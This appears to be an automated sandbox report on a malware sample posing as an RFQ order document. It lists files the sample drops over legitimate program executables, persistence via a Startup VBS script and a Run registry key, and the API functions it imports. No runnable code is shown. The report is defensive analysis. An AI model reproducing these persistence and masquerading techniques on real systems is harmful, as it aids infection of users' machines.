Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\Uninstall.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	File created: C:\Windows\System32\FXSSVC.exe			Jump to dropped file
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	File created: C:\Windows\System32\msdtc.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_pwa_launcher.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\Installer\setup.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File created: C:\Users\user\AppData\Roaming\XClient.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe			Jump to dropped file
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File created: C:\Windows\System32\alg.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\cookie_exporter.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zFM.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\Installer\setup.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\BHO\ie_to_edge_stub.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe			Jump to dropped file
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File created: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\pwahelper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\elevation_service.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\cookie_exporter.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\notification_helper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\pwahelper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\identity_helper.exe			Jump to dropped file

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe			Jump to dropped file
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File created: C:\Windows\System32\AppVClient.exe			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	File created: C:\Windows\System32\FXSSVC.exe			Jump to dropped file
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File created: C:\Windows\System32\alg.exe			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	File created: C:\Windows\System32\msdtc.exe			Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exhilaratingly.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exhilaratingly.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exhilaratingly.vbs

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_02FACBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_02FACBD0

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_004048D7
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00485376

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00423187

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
